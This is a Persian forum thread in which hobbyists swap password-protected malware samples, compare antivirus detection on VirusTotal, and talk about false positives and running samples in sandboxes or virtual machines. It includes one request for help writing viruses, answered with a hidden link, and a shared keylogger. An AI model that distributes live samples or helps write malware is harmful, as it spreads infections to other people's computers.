ava uk جان یه توضیح کامل در مورد استفاده از سندباکس بدی خیلی خوب میشه. یا اینجا یا تاپیک بزنی چیزی. همین الا بچه ها و از جمله من ویروس هارو توی سیستم اصلی اجرا کنیم. اگه اینجا باشه من توی پست اول بذارمش هم خوبه هرجا دوست داری. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] من خودم خیلی وقته سندباکس رو نصب دارم اما اصلا ازش استفاده نکردم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] راهنمایی کنی چطور بدون خطر اجرا بشن خیلی خوبه. من موقع اجرا یکی از اینها اخطار اجرا دریافت کردم. :46:

الان دقت کردم دیدم حتی مای کامپیوتر رو هم میشه با این برنامه باز کرد. :20: زحمتش افتاده گردن خودت رفیق :31:

به زور داری میندازی گردنم :21:
باشه عزیز سر فرصت حتما در یک تاپیک جدا مخصوص SandboxIE این کار رو میکنم. فقط منظورت رو از اینکه گفتی من خودم خیلی وقته سندباکس رو نصب دارم اما اصلا ازش استفاده نکردم متوجه نشدم. منظورت سند باکس کسپرسکی است یا برنامه ی SandBoxie یعنی همونی که در صفحه ی قبل اون تروجان رو باهاش آزمایش کردم؟

چون سند باکس کسپرسکی تنظیماتی نداره که بخواد توضیحی بخواد. اما SandboxIE رو میشه برای آشنایی توضیحاتی رو در موردش بدم.


من موقع اجرا یکی از اینها اخطار اجرا دریافت کردم

احتمالا فایل خواسته از طریق CMD خودش رو اجرا کنه و چون نتونسته اخطار اجرا نشدن فایل رو بهتون نشون داده چون سند باکس دستریسی این جک و جونور ها رو به سیستم جیز میکنه :31:

سیستمت چند بایتیه؟ خیلی از روتکیت ها و حتی تروجانها در سیستم های 64 بیتی مخصوصا ویندوز 7 حتی اگر آنتی ویروس هم نداشته باشید قابل اجرا شدن نیستند. 64 بیتی ها امنیت بیشتری نسبت 32 بیتی ها دارند.
در ضمن خود ویندوز بدون هیچ آنتی ویروسی از طریق DEP میتونه جلوی اجرا شدن بعضی از این فایل ها رو بگیره. که البته من برای همه پروسه های اجرایی اون رو فعال کردم.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با تنظیمات پیشفرض ویندوز تیک قسمت بالا و فقط برای پروسه های برنامه ها و سرویس ها فعال شده اما من پایینی رو ترجیح میدم. یعنی برای همه برنامه ها و سرویس ها و هر چیزی که بخواد اجرا بشه. :46:

یک دلیل دیگه هم برای اجرا نشدن بعضی کرمها و ویروسها در Virtual Machine مانند چیزی که Sandbox ها درست میکنند اینه که بعضی از اینها متوجه میشند که در یک سیستم واقعی اجرا نشدند و خودشون از روی عمد و به دلیل اینکه شناسایی نشند اجرا نمیشند چون فکر میکنند که ممکنه که جستجوگر ویروس و فایل های آلوده از طرف یکی از شرکت های آنتی ویروس باشه و بخواد رد پاشو بدست بیاره. مثل همون تروجانی که اجرا کردم و 4 تا فایل دیگه رو دانلود کرد.

به همین دلیل بعضی هاشون صوتی نمیدن :31: این جورشم داریم دیگه :10:

مرسی ava uk بازم به خاطر نحقیقات خوبی که کردی. راستش منم گفتم مشکوک و متحیرم که ببینم این فایل ها مخرب هستند یا نه. به اضافه این مورد هایی که شما گفتی از 6 تا 5 مورد رو گفتی فالس الارم هستند این مورد هم باید به بقیه اضافه بشه. توی این پست هم اشاره کردم شک دارم مخرب باشند اما هنوز هم شک باقیست.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددلیل این همه فالس آلارم چیه. توی توتال بازم اپلود کنید می بینید چندتا آنتی ویروس دیگه هم این هارو ویروس شناختند یعنی در عرض 2 روز به تعداد آنتی ویروس هایی که شناسایی کردند اضافه شده این یکی از دلایل من مبنی بر مخرب بودنشون هست وگرنه فالس آلارم توی 2 روز به نظر نمیرسه و دلیل دیگه فکر نکنم آنتی ویروس فایل نصب اسکایپ و یا کسپرسکی رو بگه ویروس یا اسپای کننده هست.


من این فایل هارو برای اویرا به عنوان فالس الارم ارسال میکنم تا یه مقدار مسئله روشن بشه.

---------------------------------

بله همین سندباکسیه خودتون :31: نتونستم ویروس هارو باهاش اجرا کنم. حالا توضیحاتش رو بدی ببینم کجای کار اشتباه ست.

منتظریم


ویرایش:

فایل ها به عنوان false positive برای آویرا ارسال شد نتیجه ای که داد 5 تا از این ها مخرب هستند اما 2 حالت وجود داره :

چون تا بعد از ارسال جواب رو ارسال کرد 2 احتمال هست

1- آنالیز نمیکنند و این جواب فقط همون دیتابیس آویرا رو نشون میده.

2- این فایل قبلا برای آویرا به عنوان false positive ارسال شده و آنالیز شده و مخرب شناسایی و سیستم جواب آنالیز قبلی رو میده.

مثلا اگه یک فایل چندین بار برای اویرا به عنوان مشکوک ارسال بشه و سالم باشه سیستم به طور خودکار جواب سالم بودنش رو آنلاین میده.

ava uk جان امروز این 7 ( 6 تا آخری با اون آیکون کسپرسکی ) تا فایل رو کلی وقت گذاشتم تست کردم دیدم حق با شماست و آنتی ویروس ها به اشتباه این exe ها رو ایراد می گرند و حتی گزینه سامبت آویرا برای آنالیز دوباره فالس آلارم هاش اشتباه هست و همون گزینه 1 بالا درسته فایل های فالس رو آویرا آنالیز نمیکنه. دلیل اشتباه آنتی ویروس هارو هم متوجه شدم چون این 7 تا ===> توسط سیستم ریستور وین بک آپ گیری شده این ایراد پیدا شده و تمام آنتی ویروس ها به اشتباه این 7 عدد رو ویروس پیدا می کنند.

پس به قول شما این تست false positive برای آنتی ویروس ها باید باشه و کسپرسکی به درست ویروس حساب نکرده.


امیدوارم فردا امتحانم رو بد ندم دیگه تست برای امروز بسه

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
-----------------

اینم برای عذر خواهی از دیتابیس کسپرسکی:

مخرب

توتال


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: dr

همگی خوب و خوش باشید.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ava uk جان امروز این 7 ( 6 تا آخری با اون آیکون کسپرسکی ) تا فایل رو کلی وقت گذاشتم تست کردم دیدم حق با شماست و آنتی ویروس ها به اشتباه این exe ها رو ایراد می گرند و حتی گزینه سامبت آویرا برای آنالیز دوباره فالس آلارم هاش اشتباه هست و همون گزینه 1 بالا درسته فایل های فالس رو آویرا آنالیز نمیکنه. دلیل اشتباه آنتی ویروس هارو هم متوجه شدم چون این 7 تا ===> توسط سیستم ریستور وین بک آپ گیری شده این ایراد پیدا شده و تمام آنتی ویروس ها به اشتباه این 7 عدد رو ویروس پیدا می کنند.

پس به قول شما این تست false positive برای آنتی ویروس ها باید باشه و کسپرسکی به درست ویروس حساب نکرده.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

مرسی عزیز که وقت گذاشتی. :11:
منم در آزمایشگاه کوچک خودم بعدا متوجه شدم که بعضی از این فایل ها نه تنها برای کسپرسکی ناشناخته نبودند بلکه کسپرسکی اونها در لیست سفید خودش بصورت برنامه ثبت کرده تا با اجرا کردنشون Application Control جلوی اونها رو نگیره. :46:
اسمشون در Kaspersky Security Network Database ثبت شده. یکیش مثلا همون برنامه ساخت دانلود و آپلود تورنت مصنوعی بود.

Avira به خیلی از کیجن ها هم گیر میده. تا حالا دیدم با اسمهای تروجان, کرم و ویروس بعضی هاشون رو معرفی میکنه اما بعد از باز کردنشون دیدم که هیچ چیزی بغیر از یک کیجن معمولی نبودند. البته برای تست هم که شده اونها رو برای کسپرسکی فرستادم اما کسپرسکی فایل ها رو سالم دونست.

امیدوارم امتحانتم خوب بدی. من که امروز حسابی خراب کردم. :31: قراره هفته آینده دوباره ازم بگیرن.

امیدوارم امتحانتم خوب بدی. من که امروز حسابی خراب کردم. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](4).gif قراره هفته آینده دوباره ازم بگیرن.

اصلا به شما نمیخوره دانشجو یا هنر جو یا دانش اموز باشین بیشتر میخوره استاد باشین
راستی این سایت ها مال خودتونه؟:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ava uk

توتال


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: dr

همگی خوب و خوش باشید.
[/SIZE][/SIZE][ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دکتر جان این سایتو بستن که. اگه میشه یه جای دیگه آپلود کن:11:
دستت درد نکنه:5:

اصلا به شما نمیخوره دانشجو یا هنر جو یا دانش اموز باشین بیشتر میخوره استاد باشین
راستی این سایت ها مال خودتونه؟:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مرسی عزیز نظر لطفته. منم یکیم مثل شما. تازه دارم جوشکاری میخونم. میخوام مدرک کارگری اصل بگیرم. :46:

نه این سایتها مال من بود که وقت اومدن به انجمن رو نداشتم. داشتم دنبال یک میز برای تلوزیون میگشتم این فایل text هم تو دسکتاپ بود. اشتباهی باهاشون رفته توی rar. سایتها رو باز کنی میبینی همش میز تلوزیونه اما از Tv.ART.807 تو سایت زیر بیشتر خوشم اومده. دو دلم. :13:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

میخوام تلوزیون بهش وصل بشه که مجبور نشم دیوار سوراخ کنم :31:

یکی این پست منو ربطش بده به ویروس و تاپیک لطفا :31:

اینم برای عذر خواهی از دیتابیس کسپرسکی:

مخرب

توتال


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: dr

همگی خوب و خوش باشید.
[/SIZE][/SIZE][/SIZE][ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

---------- Post added at 04:38 PM ---------- Previous post was at 04:35 PM ----------


دکتر جان این سایتو بستن که. اگه میشه یه جای دیگه آپلود کن:11:
دستت درد نکنه:5:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

این هم یک ویروسه دیگه
البته کار خاصی نمیکنه و از نوعه Joke virus


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
pass: mohsen


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

این هم یک نرم افزار تست آنتی ویروس
خیلی جالبه

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نصب کنید و با آنتی ویروستون انواعه تستها رو بگیرید.
من با کسپر 2010 تست کردم حسابی ضایع شدم:41:
میخوام برم با نود و نورتون هم تست کنم.
شما هم نتایجتون رو با آنتی ویروساتون بذارید جهت اصلاع
ممنون:11:

این لینک رو اینجا میزارم فقط لذت ببرید چون خیلی بامزست.

نمیدونم این جز جک ویروس میشه یا نه اما فوق العادست.

اول یه نفس عمیق بکشید با آرامش...... این لینک رو باز کنید. :31: ( اونایی که جنبه شوخی دارند باز کنند )


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


امیدوارم خوشتون اومده باشه :31:


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اینم یه مخربه دیگه
فقط نورتون و McAfee-GW-Edition میشناسن:46:

پسورد 123
توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام این فایل به اویرا ارسال شد و اویرا می شناسه این فایل رو اما virustotal هنوز اعلام نکرده .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

این هم یک نرم افزار تست آنتی ویروس
خیلی جالبه

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نصب کنید و با آنتی ویروستون انواعه تستها رو بگیرید.
من با کسپر 2010 تست کردم حسابی ضایع شدم:41:
میخوام برم با نود و نورتون هم تست کنم.
شما هم نتایجتون رو با آنتی ویروساتون بذارید جهت اصلاع
ممنون:11:

ورژن 2009

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ورژن 2009

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
سلام
اگه امکان داره میشه توضیح بدین که به چه صورت باید انتی ویروسو تست کنم
مرسی:11:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

---------- Post added at 04:38 PM ---------- Previous post was at 04:35 PM ----------




برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


سلام این ویروس هم برای اویرا ارسال شد و الان اویرا می شناسه اما virustotal هنوز اعلام نکرده .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام
اگه امکان داره میشه توضیح بدین که به چه صورت باید انتی ویروسو تست کنم
مرسی:11:

غریبه جان خیلی سادس.
به اینترنت وصل شو و تست رو بزن. همین

سلام
اگه امکان داره میشه توضیح بدین که به چه صورت باید انتی ویروسو تست کنم
مرسی:11:

غریبه جان خیلی سادس.
به اینترنت وصل شو و تست رو بزن. همین

البته ورژن 2010 این برنامه هم هست ولی به زبان فرانسه هستش. در کل کار باهاش ساده هست و میتونید همون 2010 رو دانلود کنید و استاندارد تست رو بزنید. البته یادتون باشه که حتما به اینترنت وصل باشید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

من نورتونا با اون برنامه که قرار دادین تست کردم
اینم نتیجه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

این نتیجه نورتون خیلی خوب بود. من روم نمیشه نتایج کسپر و نود32 رو بذارم. ممنون غریبه جان

با سلام
من يه كيلاگر از يه سايت دانلود كردم و همون طور كه تو آموزش اين برنامه ميبيند گفته شده كه فايل crack2 آلوده نيست. من تمامي فايلهاي موجود در پوشه رو با ويروس توتال برسي كردم كه هيچ كدوم نشانه ويروس نبود ولي فايل crack2 رو كسپر از روي هوش مصنوعي تروجان تشخيص داد حال درخواست من از دوستان اينه كه يه بررسي كنند ببيند تمامي فايلهايي كه در اين پوشه قرار داره آيا آلوده هستند يا نه؟


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: 123

کسپر2011 ورژن 2010 فرانسه این برنامه رو ویروس میشناسه که
همین که استاندارد تست رو زدم صدای کسپر در اومد!!!!:41::18:

با سلام
من يه كيلاگر از يه سايت دانلود كردم و همون طور كه تو آموزش اين برنامه ميبيند گفته شده كه فايل crack2 آلوده نيست. من تمامي فايلهاي موجود در پوشه رو با ويروس توتال برسي كردم كه هيچ كدوم نشانه ويروس نبود ولي فايل crack2 رو كسپر از روي هوش مصنوعي تروجان تشخيص داد حال درخواست من از دوستان اينه كه يه بررسي كنند ببيند تمامي فايلهايي كه در اين پوشه قرار داره آيا آلوده هستند يا نه؟


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123

سلام دوست عزیز اویرا هم این ویروس رو می شناسه می توانی از لینک زیر اطلاعات کامل بگیری .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

این نتیجه نورتون خیلی خوب بود. من روم نمیشه نتایج کسپر و نود32 رو بذارم. ممنون غریبه جان

منم دیروز میخواستم بزارم نزاشتم ولی الان این ماله
kis 2011
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام این ویروس هم برای اویرا ارسال شد و الان اویرا می شناسه اما virustotal هنوز اعلام نکرده .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


توتال آنلاین اسکن نمیکنه. شما یک بار دیگه اپلود کنید میبینید شناسایی میکنه. این لینک های نتیجه ریپروت هست و همیشه ثابت.

سلام دوست عزیز اویرا هم این ویروس رو می شناسه می توانی از لینک زیر اطلاعات کامل بگیری .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

چرا زماني كه با ويروس توتال اسكن كردم هيچ كدوم انتي ويروسها شناسايي نكردند

چرا زماني كه با ويروس توتال اسكن كردم هيچ كدوم انتي ويروسها شناسايي نكردند

سلام
اگه الا ارسال کنی میشناسن
به عنوان مثال خیلی از ویروس ها هستن که کسپر 2011 میشناسه ولی اگه برای توتال بفرستی کسپر نمیشناسه میدونی چرا؟
چون از نسخه هفت یا 8 کسپر استفاده میکنه :11:
ولی کسپر 2011 ار رویه behavior blocker میشناسه.:46:
ولی معمولا اویرا همه زندگی نامش دیتا بیسش هست پس زیاد به ورژنش کاری نداشته باش.:40:

مخرب تاریخ 1 ژولای 2010


توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد : Dr

مخرب تاریخ 1 ژولای 2010



توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد : Dr

:31:
سلام:10:
دکتر کاشکی این فایل رو میفرستادیم برای cmodo و Avg
به عنوان فالس الارم مینوشتیم
گر خواهی که رسوا نشوی همرنگ جماعت شو:11::31:
لینک توتال رو هم میدادیم ببینن زود اصلاح کنن:31:

:31:
سلام:10:
دکتر کاشکی این فایل رو میفرستادیم برای cmodo و Avg
به عنوان فالس الارم مینوشتیم
گر خواهی که رسوا نشوی همرنگ جماعت شو:11::31:
لینک توتال رو هم میدادیم ببینن زود اصلاح کنن:31:

مطمئن باشید فالس نیست [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] چون ava uk عزیز ممکنه تست کنه خیلی دقت کردم هم مخرب خوبی باشه هم جدید و هم کسپر نشناسه :)

مطمئن باشید فالس نیست [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] چون ava uk عزیز ممکنه تست کنه خیلی دقت کردم هم مخرب خوبی باشه هم جدید و هم کسپر نشناسه :)
شوخی کردم دکتر
میدونم شما که فالس الارم نمیزاری.:40::11:

البته ورژن 2010 این برنامه هم هست ولی به زبان فرانسه هستش. در کل کار باهاش ساده هست و میتونید همون 2010 رو دانلود کنید و استاندارد تست رو بزنید. البته یادتون باشه که حتما به اینترنت وصل باشید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

يه سوال با استفاده از اينترنت ديال آپ چقدر طول ميكشه يه سيستم رو اسكن كنه؟

يه سوال با استفاده از اينترنت ديال آپ چقدر طول ميكشه يه سيستم رو اسكن كنه؟

زیاد طول نمیکشه ابراهیم جان. اینترنت فقط برای اینه که یک سری ویروسها و تروجانها توی سیستم شبیه سازی میشن و باید آنتی ویروس اونا رو شناسایی کنه. ولی هیچکدوم ویروسه واقعی نیستند و ترسی نداره. :11:

ویروس پست دوم این تاپیک رو هنوز کسپرسکی شناسایی نمیکنه. ( کسی برای کسپر ارسال کرده ؟ )

سلام من اینو برای اویرا ارسال کردم:[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اینم جوابش:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ویروس پست دوم این تاپیک رو هنوز کسپرسکی شناسایی نمیکنه. ( کسی برای کسپر ارسال کرده ؟ )

من براي كسپر ارسال كردم

سلام
میشه این ویروسها را خودمون بنویسیم اگه میشه لطفا کمک کنید

mr30

سلام اين بالايي رو جواب بديد ممنون ميشم برا منم سواله؟؟؟

سلام
میشه این ویروسها را خودمون بنویسیم اگه میشه لطفا کمک کنید
mr30
چرا نمیشه دوست عزیز:31:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدالبته مواظب باش روی سیستم خودت تستشون نکنی
البته جناب wordship فرمودند که ادامه دارد:46:

این تروجان رو kaspersky 2011 شناختش ولی توی توتال که فرستادم نشناختش.
ویروس جدیدی هم نیست.
زمانی که یه کپی ازش گرفته بودم 17/10/2009 بود.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دانلود:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: hassan

این تروجان رو kaspersky 2011 شناختش ولی توی توتال که فرستادم نشناختش.
ویروس جدیدی هم نیست.
زمانی که یه کپی ازش گرفته بودم 17/10/2009 بود.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دانلود:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: hassan

چون ورژنی که شما استفاده میکنی 2011 هست و از behavior blocker شناخته احتمالا ولی ورژن ویروس توتال 7 هست ماله تقریبا 3 ساله پیشه . :8:
کسپر هم معمولا ساپورت دو ساله داره یهنی الان 2010 و 2011:40:
دیگه 2009 رو نداره.:40::11:

مخرب به تاریخ 2 ژولای 2010


توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

مخرب به تاریخ 2 ژولای 2010


توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



نورتون از روی سونار شناخت

نورتون از روی سونار شناخت

عالیه. از سندباکس استفاده کردید یا دیپ فیریز ؟

عالیه. از سندباکس استفاده کردید یا دیپ فیریز ؟
با هردو تست کردم
داخل سند باکس که انداختمش 4 ثانیه طول میکشه بعد ناپدید میشه
با دیپ فریز روش کلیک کردم سونار سریع حذفش کرد

با هردو تست کردم
داخل سند باکس که انداختمش 4 ثانیه طول میکشه بعد ناپدید میشه
با دیپ فریز روش کلیک کردم سونار سریع حذفش کرد

پس نمیشه با سندباکس رفتارشناسی رو تست کرد درسته ؟ یا اشتباه متوجه شدم.

پس نمیشه با سندباکس رفتارشناسی رو تست کرد درسته ؟ یا اشتباه متوجه شدم.
والله چی بگم قرار بود یه اموزش بدن یاد بگیریم:31:
ویروسو که میندازم داخل سند باکس فقط ناپدید میشه نورتونم هیچ عکس العملی از خودش نشون نمیده

والله چی بگم قرار بود یه اموزش بدن یاد بگیریم:31:
ویروسو که میندازم داخل سند باکس فقط ناپدید میشه نورتونم هیچ عکس العملی از خودش نشون نمیده

معمولا ویروس ها بعد از اجرا ناپدید میشن. خب پس همین نتیجه درسته که سونار نورتون نمیتونه سندباکس رو کنرتل کنه. و احتمالا برای کسپرسکی هم این نتیجه درست باشه.

مخرب تاریخ 1 ژولای 2010




توتال:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد : Dr


اين فايل فكر نكنم كه مخرب باشه چون براي كسپر ارسال كردم اين جواب رو داد و تا حالا هم به ديتا بيسش اضافه نشده

77l.exe

This file is in process.

همچنين تو محيط safe run هم اجرا كردم كه هيچ تغيير ايجاد نشد

معمولا ویروس ها بعد از اجرا ناپدید میشن. خب پس همین نتیجه درسته که سونار نورتون نمیتونه سندباکس رو کنرتل کنه. و احتمالا برای کسپرسکی هم این نتیجه درست باشه.

من هم اين ويروس 2 جولاي رو تو محيط safe run خود كسپر اجرا كردم و ديدم كه ويروس ناپديد شد

---------- Post added at 11:03 PM ---------- Previous post was at 11:00 PM ----------



مخرب به تاریخ 2 ژولای 2010




توتال:





برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید




دانلود:




[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]




[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]




پسورد: dr


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]




اين مخرب براي كسپر ارسال شد و اين جواب ميل كسپره:

Hello,

This message is generated by automatic letter reception system. The report contains information on what the verdicts on the files (if any in the letter) makes antivirus with latest updates. Letter will be passed to the virus analyst.

virus007.exe - Trojan.Win32.Monder.dirn

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Best Regards, Kaspersky Lab


البته virus007 همون مخرب 2 جولاي كه من تغيير نامش دادم

اين فايل فكر نكنم كه مخرب باشه چون براي كسپر ارسال كردم اين جواب رو داد و تا حالا هم به ديتا بيسش اضافه نشده
77l.exe
This file is in process.
همچنين تو محيط safe run هم اجرا كردم كه هيچ تغيير ايجاد نشد

ویروس موقع اجرا معمولا پیام خطا میده یا اصلا پیامی نمیده. با سیف مد کسپرسکی مثلا ویروس باز شه شما یک پیغام خطا دریافت میکنید یا اصلا باز نمیشه. توقع نداشته باشید مثل یک فایل اجرایی شروع کنه نصب کنه درایو انتخاب کنید و در آخر پیام موفقیت آمیز بودن نصب رو بده.

فایل بالا احتمالش هست خراب شده باشه پیام آویرا قانع کنندست. البته شده من یک نرم افزار کم حجم که باهاش کار میکنم برای تست ارسال کردم و پیام خراب بودن فایل رو هم دریافت کردم از آویرا.

اگه 2 باره پیدا کردم دوباره اپلود میکنم.

راستش من که هنوز قانع نشدم از اینکه کسپرسکی فایل های ارسالی رو آنالیز کنه. فایل پست دوم رو هم از لینک ساپورت سایت فکر کنم ارسال کردم ولی هنوز خبری نیست.

ویرایش :


راستش من که هنوز قانع نشدم از اینکه کسپرسکی فایل های ارسالی رو آنالیز کنه به خاطر پست قبل قانع شدم :) دلیل هم اسم بردن ویروس هست که چند وقتی بود این مورد وجود نداشت.

اصلاحیه ویروس 77l.exe

فایل رو دوباره آپلود کردم. فایل قبل آسیب دیده بوده. انقدر بچه ها تخصصی رو ویروس ها کار می کنند که ویروس 50 کیلوبایتی فایل نصبش ایراد داشته باشه متوجه میشن ایراد میگرن. ( ایول :) )
ممنون از ابراهیم جان و وردشیپ

توتال:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
پسورد: Dr

بهترین کار برای فهمیدن نحوه عملکرد یه ویروس نصب یه ویندوز مجازی با برنامه هایی مثل wmware وvirtual box هست.بهتره آنتی ویروس رو هم روی interactive mode قرار بدیم و از یه برنامه دیگه مثل process explorer به جای taskmanager استفاده کنیم.
یه کپی هم از هارد کامپیوتر مجازی بگیریم که اگه ویروس ویندوز رو خراب کرد دیگه مجبور نشیم دوباره ویندوز نصب کنیم.:31:

اینم کار سند باکس
یک روش دیگر برای تشخیص ویروسها استفاده از sandbox است. یک sandbox سیستم عامل را شبیه سازی کرده و فایلهای اجرایی را در این شبیه سازی اجرا می کند. بعد از پایان اجرای برنامه ها sandbox در مورد تغییراتی که ممکن است نشان دهنده ویروس باشد مورد ارزیابی قرار می گیرد.